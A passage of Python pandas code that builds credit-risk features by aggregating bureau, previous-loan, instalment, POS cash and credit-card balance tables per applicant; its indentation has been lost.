bb, categorical_cols = one_hot_encoder(bb, nan_as_category= False)
bb_processed = bb.groupby('SK_ID_BUREAU')[categorical_cols].mean().reset_index()
agg = {'MONTHS_BALANCE': ['min', 'max', 'mean', 'size']}
bb_processed = group_and_merge(bb, bb_processed, '', agg, 'SK_ID_BUREAU')
del bb; gc.collect()
return bb_processed
bureau, categorical_cols = one_hot_encoder(bureau, nan_as_category= False)
bureau = bureau.merge(get_bureau_balance(DATA_DIRECTORY), how='left', on='SK_ID_BUREAU')
bureau['STATUS_12345'] = 0
for i in range(1,6):
bureau['STATUS_12345'] += bureau['STATUS_{}'.format(i)]
features = ['AMT_CREDIT_MAX_OVERDUE', 'AMT_CREDIT_SUM_OVERDUE', 'AMT_CREDIT_SUM',
'AMT_CREDIT_SUM_DEBT', 'DEBT_PERCENTAGE', 'DEBT_CREDIT_DIFF', 'STATUS_0', 'STATUS_12345']
agg_length = bureau.groupby('MONTHS_BALANCE_SIZE')[features].mean().reset_index()
agg_length.rename({feat: 'LL_' + feat for feat in features}, axis=1, inplace=True)
bureau = bureau.merge(agg_length, how='left', on='MONTHS_BALANCE_SIZE')
del agg_length; gc.collect()
BUREAU_AGG = {
'SK_ID_BUREAU': ['nunique'],
'DAYS_CREDIT': ['min', 'max', 'mean'],
'DAYS_CREDIT_ENDDATE': ['min', 'max'],
'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],
'AMT_CREDIT_SUM': ['max', 'mean', 'sum'],
'AMT_CREDIT_SUM_DEBT': ['max', 'mean', 'sum'],
'AMT_CREDIT_SUM_OVERDUE': ['max', 'mean', 'sum'],
'AMT_ANNUITY': ['mean'],
'DEBT_CREDIT_DIFF': ['mean', 'sum'],
'MONTHS_BALANCE_MEAN': ['mean', 'var'],
'MONTHS_BALANCE_SIZE': ['mean', 'sum'],
'STATUS_0': ['mean'],
'STATUS_1': ['mean'],
'STATUS_12345': ['mean'],
'STATUS_C': ['mean'],
'STATUS_X': ['mean'],
'CREDIT_ACTIVE_Active': ['mean'],
'CREDIT_ACTIVE_Closed': ['mean'],
'CREDIT_ACTIVE_Sold': ['mean'],
'CREDIT_TYPE_Consumer credit': ['mean'],
'CREDIT_TYPE_Credit card': ['mean'],
'CREDIT_TYPE_Car loan': ['mean'],
'CREDIT_TYPE_Mortgage': ['mean'],
'CREDIT_TYPE_Microloan': ['mean'],
'LL_AMT_CREDIT_SUM_OVERDUE': ['mean'],
'LL_DEBT_CREDIT_DIFF': ['mean'],
'LL_STATUS_12345': ['mean'],
}
BUREAU_ACTIVE_AGG = {
'DAYS_CREDIT': ['max', 'mean'],
'DAYS_CREDIT_ENDDATE': ['min', 'max'],
'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],
'AMT_CREDIT_SUM': ['max', 'sum'],
'AMT_CREDIT_SUM_DEBT': ['mean', 'sum'],
'AMT_CREDIT_SUM_OVERDUE': ['max', 'mean'],
'DAYS_CREDIT_UPDATE': ['min', 'mean'],
'DEBT_PERCENTAGE': ['mean'],
'DEBT_CREDIT_DIFF': ['mean'],
'CREDIT_TO_ANNUITY_RATIO': ['mean'],
'MONTHS_BALANCE_MEAN': ['mean', 'var'],
'MONTHS_BALANCE_SIZE': ['mean', 'sum'],
}
BUREAU_CLOSED_AGG = {
'DAYS_CREDIT': ['max', 'var'],
'DAYS_CREDIT_ENDDATE': ['max'],
'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],
'AMT_CREDIT_SUM_OVERDUE': ['mean'],
'AMT_CREDIT_SUM': ['max', 'mean', 'sum'],
'AMT_CREDIT_SUM_DEBT': ['max', 'sum'],
'DAYS_CREDIT_UPDATE': ['max'],
'ENDDATE_DIF': ['mean'],
'STATUS_12345': ['mean'],
}
BUREAU_LOAN_TYPE_AGG = {
'DAYS_CREDIT': ['mean', 'max'],
'AMT_CREDIT_MAX_OVERDUE': ['mean', 'max'],
'AMT_CREDIT_SUM': ['mean', 'max'],
'AMT_CREDIT_SUM_DEBT': ['mean', 'max'],
'DEBT_PERCENTAGE': ['mean'],
'DEBT_CREDIT_DIFF': ['mean'],
'DAYS_CREDIT_ENDDATE': ['max'],
}
BUREAU_TIME_AGG = {
'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],
'AMT_CREDIT_SUM_OVERDUE': ['mean'],
'AMT_CREDIT_SUM': ['max', 'sum'],
'AMT_CREDIT_SUM_DEBT': ['mean', 'sum'],
'DEBT_PERCENTAGE': ['mean'],
'DEBT_CREDIT_DIFF': ['mean'],
'STATUS_0': ['mean'],
'STATUS_12345': ['mean'],
}
agg_bureau = group(bureau, 'BUREAU_', BUREAU_AGG)
active = bureau[bureau['CREDIT_ACTIVE_Active'] == 1]
agg_bureau = group_and_merge(active,agg_bureau,'BUREAU_ACTIVE_',BUREAU_ACTIVE_AGG)
closed = bureau[bureau['CREDIT_ACTIVE_Closed'] == 1]
agg_bureau = group_and_merge(closed,agg_bureau,'BUREAU_CLOSED_',BUREAU_CLOSED_AGG)
del active, closed; gc.collect()
for credit_type in ['Consumer credit', 'Credit card', 'Mortgage', 'Car loan', 'Microloan']:
type_df = bureau[bureau['CREDIT_TYPE_' + credit_type] == 1]
prefix = 'BUREAU_' + credit_type.split(' ')[0].upper() + '_'
agg_bureau = group_and_merge(type_df, agg_bureau, prefix, BUREAU_LOAN_TYPE_AGG)
del type_df; gc.collect()
for time_frame in [6, 12]:
prefix = "BUREAU_LAST{}M_".format(time_frame)
time_frame_df = bureau[bureau['DAYS_CREDIT'] >= -30*time_frame]
agg_bureau = group_and_merge(time_frame_df, agg_bureau, prefix, BUREAU_TIME_AGG)
del time_frame_df; gc.collect()
sort_bureau = bureau.sort_values(by=['DAYS_CREDIT'])
gr = sort_bureau.groupby('SK_ID_CURR')['AMT_CREDIT_MAX_OVERDUE'].last().reset_index()
gr.rename({'AMT_CREDIT_MAX_OVERDUE': 'BUREAU_LAST_LOAN_MAX_OVERDUE'}, inplace=True)
agg_bureau = agg_bureau.merge(gr, on='SK_ID_CURR', how='left')
agg_bureau['BUREAU_DEBT_OVER_CREDIT'] = \
agg_bureau['BUREAU_AMT_CREDIT_SUM_DEBT_SUM']/agg_bureau['BUREAU_AMT_CREDIT_SUM_SUM']
agg_bureau['BUREAU_ACTIVE_DEBT_OVER_CREDIT'] = \
agg_bureau['BUREAU_ACTIVE_AMT_CREDIT_SUM_DEBT_SUM']/agg_bureau['BUREAU_ACTIVE_AMT_CREDIT_SUM_SUM']
df = pd.merge(df, agg_bureau, on='SK_ID_CURR', how='left')
del agg_bureau, bureau
gc.collect()
prev = pd.read_csv(os.path.join(DATA_DIRECTORY, 'previous_application.csv'))
pay = pd.read_csv(os.path.join(DATA_DIRECTORY, 'installments_payments.csv'))
PREVIOUS_AGG = {
'SK_ID_PREV': ['nunique'],
'AMT_ANNUITY': ['min', 'max', 'mean'],
'AMT_DOWN_PAYMENT': ['max', 'mean'],
'HOUR_APPR_PROCESS_START': ['min', 'max', 'mean'],
'RATE_DOWN_PAYMENT': ['max', 'mean'],
'DAYS_DECISION': ['min', 'max', 'mean'],
'CNT_PAYMENT': ['max', 'mean'],
'DAYS_TERMINATION': ['max'],
# Engineered features
'CREDIT_TO_ANNUITY_RATIO': ['mean', 'max'],
'APPLICATION_CREDIT_DIFF': ['min', 'max', 'mean'],
'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean', 'var'],
'DOWN_PAYMENT_TO_CREDIT': ['mean'],
}
PREVIOUS_ACTIVE_AGG = {
'SK_ID_PREV': ['nunique'],
'SIMPLE_INTERESTS': ['mean'],
'AMT_ANNUITY': ['max', 'sum'],
'AMT_APPLICATION': ['max', 'mean'],
'AMT_CREDIT': ['sum'],
'AMT_DOWN_PAYMENT': ['max', 'mean'],
'DAYS_DECISION': ['min', 'mean'],
'CNT_PAYMENT': ['mean', 'sum'],
'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],
# Engineered features
'AMT_PAYMENT': ['sum'],
'INSTALMENT_PAYMENT_DIFF': ['mean', 'max'],
'REMAINING_DEBT': ['max', 'mean', 'sum'],
'REPAYMENT_RATIO': ['mean'],
}
PREVIOUS_LATE_PAYMENTS_AGG = {
'DAYS_DECISION': ['min', 'max', 'mean'],
'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],
# Engineered features
'APPLICATION_CREDIT_DIFF': ['min'],
'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],
'NAME_CONTRACT_TYPE_Cash loans': ['mean'],
'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],
}
PREVIOUS_LOAN_TYPE_AGG = {
'AMT_CREDIT': ['sum'],
'AMT_ANNUITY': ['mean', 'max'],
'SIMPLE_INTERESTS': ['min', 'mean', 'max', 'var'],
'APPLICATION_CREDIT_DIFF': ['min', 'var'],
'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],
'DAYS_DECISION': ['max'],
'DAYS_LAST_DUE_1ST_VERSION': ['max', 'mean'],
'CNT_PAYMENT': ['mean'],
}
PREVIOUS_TIME_AGG = {
'AMT_CREDIT': ['sum'],
'AMT_ANNUITY': ['mean', 'max'],
'SIMPLE_INTERESTS': ['mean', 'max'],
'DAYS_DECISION': ['min', 'mean'],
'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],
# Engineered features
'APPLICATION_CREDIT_DIFF': ['min'],
'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],
'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],
'NAME_CONTRACT_TYPE_Cash loans': ['mean'],
'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],
}
PREVIOUS_APPROVED_AGG = {
'SK_ID_PREV': ['nunique'],
'AMT_ANNUITY': ['min', 'max', 'mean'],
'AMT_CREDIT': ['min', 'max', 'mean'],
'AMT_DOWN_PAYMENT': ['max'],
'AMT_GOODS_PRICE': ['max'],
'HOUR_APPR_PROCESS_START': ['min', 'max'],
'DAYS_DECISION': ['min', 'mean'],
'CNT_PAYMENT': ['max', 'mean'],
'DAYS_TERMINATION': ['mean'],
# Engineered features
'CREDIT_TO_ANNUITY_RATIO': ['mean', 'max'],
'APPLICATION_CREDIT_DIFF': ['max'],
'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],
# The following features are only for approved applications
'DAYS_FIRST_DRAWING': ['max', 'mean'],
'DAYS_FIRST_DUE': ['min', 'mean'],
'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],
'DAYS_LAST_DUE': ['max', 'mean'],
'DAYS_LAST_DUE_DIFF': ['min', 'max', 'mean'],
'SIMPLE_INTERESTS': ['min', 'max', 'mean'],
}
PREVIOUS_REFUSED_AGG = {
'AMT_APPLICATION': ['max', 'mean'],
'AMT_CREDIT': ['min', 'max'],
'DAYS_DECISION': ['min', 'max', 'mean'],
'CNT_PAYMENT': ['max', 'mean'],
# Engineered features
'APPLICATION_CREDIT_DIFF': ['min', 'max', 'mean', 'var'],
'APPLICATION_CREDIT_RATIO': ['min', 'mean'],
'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],
'NAME_CONTRACT_TYPE_Cash loans': ['mean'],
'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],
}
ohe_columns = [
'NAME_CONTRACT_STATUS', 'NAME_CONTRACT_TYPE', 'CHANNEL_TYPE',
'NAME_TYPE_SUITE', 'NAME_YIELD_GROUP', 'PRODUCT_COMBINATION',
'NAME_PRODUCT_TYPE', 'NAME_CLIENT_TYPE']
prev, categorical_cols = one_hot_encoder(prev, ohe_columns, nan_as_category= False)
prev['APPLICATION_CREDIT_DIFF'] = prev['AMT_APPLICATION'] - prev['AMT_CREDIT']
prev['APPLICATION_CREDIT_RATIO'] = prev['AMT_APPLICATION'] / prev['AMT_CREDIT']
prev['CREDIT_TO_ANNUITY_RATIO'] = prev['AMT_CREDIT']/prev['AMT_ANNUITY']
prev['DOWN_PAYMENT_TO_CREDIT'] = prev['AMT_DOWN_PAYMENT'] / prev['AMT_CREDIT']
total_payment = prev['AMT_ANNUITY'] * prev['CNT_PAYMENT']
prev['SIMPLE_INTERESTS'] = (total_payment/prev['AMT_CREDIT'] - 1)/prev['CNT_PAYMENT']
approved = prev[prev['NAME_CONTRACT_STATUS_Approved'] == 1]
active_df = approved[approved['DAYS_LAST_DUE'] == 365243]
active_pay = pay[pay['SK_ID_PREV'].isin(active_df['SK_ID_PREV'])]
active_pay_agg = active_pay.groupby('SK_ID_PREV')[['AMT_INSTALMENT', 'AMT_PAYMENT']].sum()
active_pay_agg.reset_index(inplace= True)
active_pay_agg['INSTALMENT_PAYMENT_DIFF'] = active_pay_agg['AMT_INSTALMENT'] - active_pay_agg['AMT_PAYMENT']
active_df = active_df.merge(active_pay_agg, on= 'SK_ID_PREV', how= 'left')
active_df['REMAINING_DEBT'] = active_df['AMT_CREDIT'] - active_df['AMT_PAYMENT']
active_df['REPAYMENT_RATIO'] = active_df['AMT_PAYMENT'] / active_df['AMT_CREDIT']
active_agg_df = group(active_df, 'PREV_ACTIVE_', PREVIOUS_ACTIVE_AGG)
active_agg_df['TOTAL_REPAYMENT_RATIO'] = active_agg_df['PREV_ACTIVE_AMT_PAYMENT_SUM']/\
active_agg_df['PREV_ACTIVE_AMT_CREDIT_SUM']
del active_pay, active_pay_agg, active_df; gc.collect()
prev['DAYS_FIRST_DRAWING'].replace(365243, np.nan, inplace= True)
prev['DAYS_FIRST_DUE'].replace(365243, np.nan, inplace= True)
prev['DAYS_LAST_DUE_1ST_VERSION'].replace(365243, np.nan, inplace= True)
prev['DAYS_LAST_DUE'].replace(365243, np.nan, inplace= True)
prev['DAYS_TERMINATION'].replace(365243, np.nan, inplace= True)
prev['DAYS_LAST_DUE_DIFF'] = prev['DAYS_LAST_DUE_1ST_VERSION'] - prev['DAYS_LAST_DUE']
approved['DAYS_LAST_DUE_DIFF'] = approved['DAYS_LAST_DUE_1ST_VERSION'] - approved['DAYS_LAST_DUE']
categorical_agg = {key: ['mean'] for key in categorical_cols}
agg_prev = group(prev, 'PREV_', {**PREVIOUS_AGG, **categorical_agg})
agg_prev = agg_prev.merge(active_agg_df, how='left', on='SK_ID_CURR')
del active_agg_df; gc.collect()
agg_prev = group_and_merge(approved, agg_prev, 'APPROVED_', PREVIOUS_APPROVED_AGG)
refused = prev[prev['NAME_CONTRACT_STATUS_Refused'] == 1]
agg_prev = group_and_merge(refused, agg_prev, 'REFUSED_', PREVIOUS_REFUSED_AGG)
del approved, refused; gc.collect()
for loan_type in ['Consumer loans', 'Cash loans']:
type_df = prev[prev['NAME_CONTRACT_TYPE_{}'.format(loan_type)] == 1]
prefix = 'PREV_' + loan_type.split(" ")[0] + '_'
agg_prev = group_and_merge(type_df, agg_prev, prefix, PREVIOUS_LOAN_TYPE_AGG)
del type_df; gc.collect()
pay['LATE_PAYMENT'] = pay['DAYS_ENTRY_PAYMENT'] - pay['DAYS_INSTALMENT']
pay['LATE_PAYMENT'] = pay['LATE_PAYMENT'].apply(lambda x: 1 if x > 0 else 0)
dpd_id = pay[pay['LATE_PAYMENT'] > 0]['SK_ID_PREV'].unique()
agg_dpd = group_and_merge(prev[prev['SK_ID_PREV'].isin(dpd_id)], agg_prev,
'PREV_LATE_', PREVIOUS_LATE_PAYMENTS_AGG)
del agg_dpd, dpd_id; gc.collect()
for time_frame in [12, 24]:
time_frame_df = prev[prev['DAYS_DECISION'] >= -30*time_frame]
prefix = 'PREV_LAST{}M_'.format(time_frame)
agg_prev = group_and_merge(time_frame_df, agg_prev, prefix, PREVIOUS_TIME_AGG)
del time_frame_df; gc.collect()
del prev; gc.collect()
df = pd.merge(df, agg_prev, on='SK_ID_CURR', how='left')
del agg_prev; gc.collect()
pos = pd.read_csv(os.path.join(DATA_DIRECTORY, 'POS_CASH_balance.csv'))
pos, categorical_cols = one_hot_encoder(pos, nan_as_category= False)
pos['LATE_PAYMENT'] = pos['SK_DPD'].apply(lambda x: 1 if x > 0 else 0)
POS_CASH_AGG = {
'SK_ID_PREV': ['nunique'],
'MONTHS_BALANCE': ['min', 'max', 'size'],
'SK_DPD': ['max', 'mean', 'sum', 'var'],
'SK_DPD_DEF': ['max', 'mean', 'sum'],
'LATE_PAYMENT': ['mean']
}
categorical_agg = {key: ['mean'] for key in categorical_cols}
pos_agg = group(pos, 'POS_', {**POS_CASH_AGG, **categorical_agg})
sort_pos = pos.sort_values(by=['SK_ID_PREV', 'MONTHS_BALANCE'])
gp = sort_pos.groupby('SK_ID_PREV')
temp = pd.DataFrame()
temp['SK_ID_CURR'] = gp['SK_ID_CURR'].first()
temp['MONTHS_BALANCE_MAX'] = gp['MONTHS_BALANCE'].max()
temp['POS_LOAN_COMPLETED_MEAN'] = gp['NAME_CONTRACT_STATUS_Completed'].mean()
temp['POS_COMPLETED_BEFORE_MEAN'] = gp['CNT_INSTALMENT'].first() - gp['CNT_INSTALMENT'].last()
temp['POS_COMPLETED_BEFORE_MEAN'] = temp.apply(lambda x: 1 if x['POS_COMPLETED_BEFORE_MEAN'] > 0
and x['POS_LOAN_COMPLETED_MEAN'] > 0 else 0, axis=1)
temp['POS_REMAINING_INSTALMENTS'] = gp['CNT_INSTALMENT_FUTURE'].last()
temp['POS_REMAINING_INSTALMENTS_RATIO'] = gp['CNT_INSTALMENT_FUTURE'].last()/gp['CNT_INSTALMENT'].last()
temp_gp = temp.groupby('SK_ID_CURR').sum().reset_index()
temp_gp.drop(['MONTHS_BALANCE_MAX'], axis=1, inplace= True)
pos_agg = pd.merge(pos_agg, temp_gp, on= 'SK_ID_CURR', how= 'left')
del temp, gp, temp_gp, sort_pos; gc.collect()
pos = do_sum(pos, ['SK_ID_PREV'], 'LATE_PAYMENT', 'LATE_PAYMENT_SUM')
last_month_df = pos.groupby('SK_ID_PREV')['MONTHS_BALANCE'].idxmax()
sort_pos = pos.sort_values(by=['SK_ID_PREV', 'MONTHS_BALANCE'])
gp = sort_pos.iloc[last_month_df].groupby('SK_ID_CURR').tail(3)
gp_mean = gp.groupby('SK_ID_CURR').mean().reset_index()
pos_agg = pd.merge(pos_agg, gp_mean[['SK_ID_CURR','LATE_PAYMENT_SUM']], on='SK_ID_CURR', how='left')
drop_features = [
'POS_NAME_CONTRACT_STATUS_Canceled_MEAN', 'POS_NAME_CONTRACT_STATUS_Amortized debt_MEAN',
'POS_NAME_CONTRACT_STATUS_XNA_MEAN']
pos_agg.drop(drop_features, axis=1, inplace=True)
df = pd.merge(df, pos_agg, on='SK_ID_CURR', how='left')
pay = do_sum(pay, ['SK_ID_PREV', 'NUM_INSTALMENT_NUMBER'], 'AMT_PAYMENT', 'AMT_PAYMENT_GROUPED')
pay['PAYMENT_DIFFERENCE'] = pay['AMT_INSTALMENT'] - pay['AMT_PAYMENT_GROUPED']
pay['PAYMENT_RATIO'] = pay['AMT_INSTALMENT'] / pay['AMT_PAYMENT_GROUPED']
pay['PAID_OVER_AMOUNT'] = pay['AMT_PAYMENT'] - pay['AMT_INSTALMENT']
pay['PAID_OVER'] = (pay['PAID_OVER_AMOUNT'] > 0).astype(int)
pay['DPD'] = pay['DAYS_ENTRY_PAYMENT'] - pay['DAYS_INSTALMENT']
pay['DPD'] = pay['DPD'].apply(lambda x: 0 if x <= 0 else x)
pay['DBD'] = pay['DAYS_INSTALMENT'] - pay['DAYS_ENTRY_PAYMENT']
pay['DBD'] = pay['DBD'].apply(lambda x: 0 if x <= 0 else x)
pay['LATE_PAYMENT'] = pay['DBD'].apply(lambda x: 1 if x > 0 else 0)
pay['INSTALMENT_PAYMENT_RATIO'] = pay['AMT_PAYMENT'] / pay['AMT_INSTALMENT']
pay['LATE_PAYMENT_RATIO'] = pay.apply(lambda x: x['INSTALMENT_PAYMENT_RATIO'] if x['LATE_PAYMENT'] == 1 else 0, axis=1)
pay['SIGNIFICANT_LATE_PAYMENT'] = pay['LATE_PAYMENT_RATIO'].apply(lambda x: 1 if x > 0.05 else 0)
pay['DPD_7'] = pay['DPD'].apply(lambda x: 1 if x >= 7 else 0)
pay['DPD_15'] = pay['DPD'].apply(lambda x: 1 if x >= 15 else 0)
INSTALLMENTS_AGG = {
'SK_ID_PREV': ['size', 'nunique'],
'DAYS_ENTRY_PAYMENT': ['min', 'max', 'mean'],
'AMT_INSTALMENT': ['min', 'max', 'mean', 'sum'],
'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],
'DPD': ['max', 'mean', 'var'],
'DBD': ['max', 'mean', 'var'],
'PAYMENT_DIFFERENCE': ['mean'],
'PAYMENT_RATIO': ['mean'],
'LATE_PAYMENT': ['mean', 'sum'],
'SIGNIFICANT_LATE_PAYMENT': ['mean', 'sum'],
'LATE_PAYMENT_RATIO': ['mean'],
'DPD_7': ['mean'],
'DPD_15': ['mean'],
'PAID_OVER': ['mean']
}
pay_agg = group(pay, 'INS_', INSTALLMENTS_AGG)
INSTALLMENTS_TIME_AGG = {
'SK_ID_PREV': ['size'],
'DAYS_ENTRY_PAYMENT': ['min', 'max', 'mean'],
'AMT_INSTALMENT': ['min', 'max', 'mean', 'sum'],
'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],
'DPD': ['max', 'mean', 'var'],
'DBD': ['max', 'mean', 'var'],
'PAYMENT_DIFFERENCE': ['mean'],
'PAYMENT_RATIO': ['mean'],
'LATE_PAYMENT': ['mean'],
'SIGNIFICANT_LATE_PAYMENT': ['mean'],
'LATE_PAYMENT_RATIO': ['mean'],
'DPD_7': ['mean'],
'DPD_15': ['mean'],
}
for months in [36, 60]:
recent_prev_id = pay[pay['DAYS_INSTALMENT'] >= -30*months]['SK_ID_PREV'].unique()
pay_recent = pay[pay['SK_ID_PREV'].isin(recent_prev_id)]
prefix = 'INS_{}M_'.format(months)
pay_agg = group_and_merge(pay_recent, pay_agg, prefix, INSTALLMENTS_TIME_AGG)
def add_features_in_group(features, gr_, feature_name, aggs, prefix):
for agg in aggs:
if agg == 'sum':
features['{}{}_sum'.format(prefix, feature_name)] = gr_[feature_name].sum()
elif agg == 'mean':
features['{}{}_mean'.format(prefix, feature_name)] = gr_[feature_name].mean()
elif agg == 'max':
features['{}{}_max'.format(prefix, feature_name)] = gr_[feature_name].max()
elif agg == 'min':
features['{}{}_min'.format(prefix, feature_name)] = gr_[feature_name].min()
elif agg == 'std':
features['{}{}_std'.format(prefix, feature_name)] = gr_[feature_name].std()
elif agg == 'count':
features['{}{}_count'.format(prefix, feature_name)] = gr_[feature_name].count()
elif agg == 'skew':
features['{}{}_skew'.format(prefix, feature_name)] = skew(gr_[feature_name])
elif agg == 'kurt':
features['{}{}_kurt'.format(prefix, feature_name)] = kurtosis(gr_[feature_name])
elif agg == 'iqr':
features['{}{}_iqr'.format(prefix, feature_name)] = iqr(gr_[feature_name])
elif agg == 'median':
features['{}{}_median'.format(prefix, feature_name)] = gr_[feature_name].median()
return features
def chunk_groups(groupby_object, chunk_size):
n_groups = groupby_object.ngroups
group_chunk, index_chunk = [], []
for i, (index, df) in enumerate(groupby_object):
group_chunk.append(df)
index_chunk.append(index)
if (i + 1) % chunk_size == 0 or i + 1 == n_groups:
group_chunk_, index_chunk_ = group_chunk.copy(), index_chunk.copy()
group_chunk, index_chunk = [], []
yield index_chunk_, group_chunk_
def add_trend_feature(features, gr, feature_name, prefix):
y = gr[feature_name].values
try:
x = np.arange(0, len(y)).reshape(-1, 1)
lr = LinearRegression()
lr.fit(x, y)
trend = lr.coef_[0]
except:
trend = np.nan
features['{}{}'.format(prefix, feature_name)] = trend
return features
def parallel_apply(groups, func, index_name='Index', num_workers=0, chunk_size=100000):
if num_workers <= 0: num_workers = 8
#n_chunks = np.ceil(1.0 * groups.ngroups / chunk_size)
indeces, features = [], []
for index_chunk, groups_chunk in chunk_groups(groups, chunk_size):
with mp.pool.Pool(num_workers) as executor:
features_chunk = executor.map(func, groups_chunk)
features.extend(features_chunk)
indeces.extend(index_chunk)
features = pd.DataFrame(features)
features.index = indeces
features.index.name = index_name
return features
def trend_in_last_k_instalment_features(gr, periods):
gr_ = gr.copy()
gr_.sort_values(['DAYS_INSTALMENT'], ascending=False, inplace=True)
features = {}
for period in periods:
gr_period = gr_.iloc[:period]
features = add_trend_feature(features, gr_period, 'DPD',
'{}_TREND_'.format(period))
features = add_trend_feature(features, gr_period, 'PAID_OVER_AMOUNT',
'{}_TREND_'.format(period))
return features
group_features = ['SK_ID_CURR', 'SK_ID_PREV', 'DPD', 'LATE_PAYMENT',
'PAID_OVER_AMOUNT', 'PAID_OVER', 'DAYS_INSTALMENT']
gp = pay[group_features].groupby('SK_ID_CURR')
func = partial(trend_in_last_k_instalment_features, periods=[12, 24, 60, 120])
g = parallel_apply(gp, func, index_name='SK_ID_CURR', chunk_size=10000).reset_index()
pay_agg = pay_agg.merge(g, on='SK_ID_CURR', how='left')
def installments_last_loan_features(gr):
gr_ = gr.copy()
gr_.sort_values(['DAYS_INSTALMENT'], ascending=False, inplace=True)
last_installment_id = gr_['SK_ID_PREV'].iloc[0]
gr_ = gr_[gr_['SK_ID_PREV'] == last_installment_id]
features = {}
features = add_features_in_group(features, gr_, 'DPD',
['sum', 'mean', 'max', 'std'],
'LAST_LOAN_')
features = add_features_in_group(features, gr_, 'LATE_PAYMENT',
['count', 'mean'],
'LAST_LOAN_')
features = add_features_in_group(features, gr_, 'PAID_OVER_AMOUNT',
['sum', 'mean', 'max', 'min', 'std'],
'LAST_LOAN_')
features = add_features_in_group(features, gr_, 'PAID_OVER',
['count', 'mean'],
'LAST_LOAN_')
return features
g = parallel_apply(gp, installments_last_loan_features, index_name='SK_ID_CURR', chunk_size=10000).reset_index()
pay_agg = pay_agg.merge(g, on='SK_ID_CURR', how='left')
df = pd.merge(df, pay_agg, on='SK_ID_CURR', how='left')
del pay_agg, gp, pay; gc.collect()
cc = pd.read_csv(os.path.join(DATA_DIRECTORY, 'credit_card_balance.csv'))
cc, cat_cols = one_hot_encoder(cc, nan_as_category=False)
cc.rename(columns={'AMT_RECIVABLE': 'AMT_RECEIVABLE'}, inplace=True)
cc['LIMIT_USE'] = cc['AMT_BALANCE'] / cc['AMT_CREDIT_LIMIT_ACTUAL']
cc['PAYMENT_DIV_MIN'] = cc['AMT_PAYMENT_CURRENT'] / cc['AMT_INST_MIN_REGULARITY']
cc['LATE_PAYMENT'] = cc['SK_DPD'].apply(lambda x: 1 if x > 0 else 0)
cc['DRAWING_LIMIT_RATIO'] = cc['AMT_DRAWINGS_ATM_CURRENT'] / cc['AMT_CREDIT_LIMIT_ACTUAL']
CREDIT_CARD_AGG = {
'MONTHS_BALANCE': ['min'],
'AMT_BALANCE': ['max'],
'AMT_CREDIT_LIMIT_ACTUAL': ['max'],
'AMT_DRAWINGS_ATM_CURRENT': ['max', 'sum'],
'AMT_DRAWINGS_CURRENT': ['max', 'sum'],
'AMT_DRAWINGS_POS_CURRENT': ['max', 'sum'],
'AMT_INST_MIN_REGULARITY': ['max', 'mean'],
'AMT_PAYMENT_TOTAL_CURRENT': ['max', 'mean', 'sum', 'var'],
'AMT_TOTAL_RECEIVABLE': ['max', 'mean'],
'CNT_DRAWINGS_ATM_CURRENT': ['max', 'mean', 'sum'],
'CNT_DRAWINGS_CURRENT': ['max', 'mean', 'sum'],
'CNT_DRAWINGS_POS_CURRENT': ['mean'],
'SK_DPD': ['mean', 'max', 'sum'],
'SK_DPD_DEF': ['max', 'sum'],
'LIMIT_USE': ['max', 'mean'],
'PAYMENT_DIV_MIN': ['min', 'mean'],
'LATE_PAYMENT': ['max', 'sum'],
}
cc_agg = cc.groupby('SK_ID_CURR').agg(CREDIT_CARD_AGG)
cc_agg.columns = pd.Index(['CC_' + e[0] + "_" + e[1].upper() for e in cc_agg.columns.tolist()])
cc_agg.reset_index(inplace= True)
last_ids = cc.groupby('SK_ID_PREV')['MONTHS_BALANCE'].idxmax()
last_months_df = cc[cc.index.isin(last_ids)]
cc_agg = group_and_merge(last_months_df,cc_agg,'CC_LAST_', {'AMT_BALANCE': ['mean', 'max']})
CREDIT_CARD_TIME_AGG = {
'CNT_DRAWINGS_ATM_CURRENT': ['mean'],
'SK_DPD': ['max', 'sum'],
'AMT_BALANCE': ['mean', 'max'],
'LIMIT_USE': ['max', 'mean']
}
for months in [12, 24, 48]:
cc_prev_id = cc[cc['MONTHS_BALANCE'] >= -months]['SK_ID_PREV'].unique()
cc_recent = cc[cc['SK_ID_PREV'].isin(cc_prev_id)]
prefix = 'INS_{}M_'.format(months)
cc_agg = group_and_merge(cc_recent, cc_agg, prefix, CREDIT_CARD_TIME_AGG)
df = pd.merge(df, cc_agg, on='SK_ID_CURR', how='left')
del cc, cc_agg; gc.collect()
def add_ratios_features(df):
df['BUREAU_INCOME_CREDIT_RATIO'] = df['BUREAU_AMT_CREDIT_SUM_MEAN'] / df['AMT_INCOME_TOTAL']
df['BUREAU_ACTIVE_CREDIT_TO_INCOME_RATIO'] = df['BUREAU_ACTIVE_AMT_CREDIT_SUM_SUM'] / df['AMT_INCOME_TOTAL']
df['CURRENT_TO_APPROVED_CREDIT_MIN_RATIO'] = df['APPROVED_AMT_CREDIT_MIN'] / df['AMT_CREDIT']
df['CURRENT_TO_APPROVED_CREDIT_MAX_RATIO'] = df['APPROVED_AMT_CREDIT_MAX'] / df['AMT_CREDIT']
df['CURRENT_TO_APPROVED_CREDIT_MEAN_RATIO'] = df['APPROVED_AMT_CREDIT_MEAN'] / df['AMT_CREDIT']
df['CURRENT_TO_APPROVED_ANNUITY_MAX_RATIO'] = df['APPROVED_AMT_ANNUITY_MAX'] / df['AMT_ANNUITY']
df['CURRENT_TO_APPROVED_ANNUITY_MEAN_RATIO'] = df['APPROVED_AMT_ANNUITY_MEAN'] / df['AMT_ANNUITY']
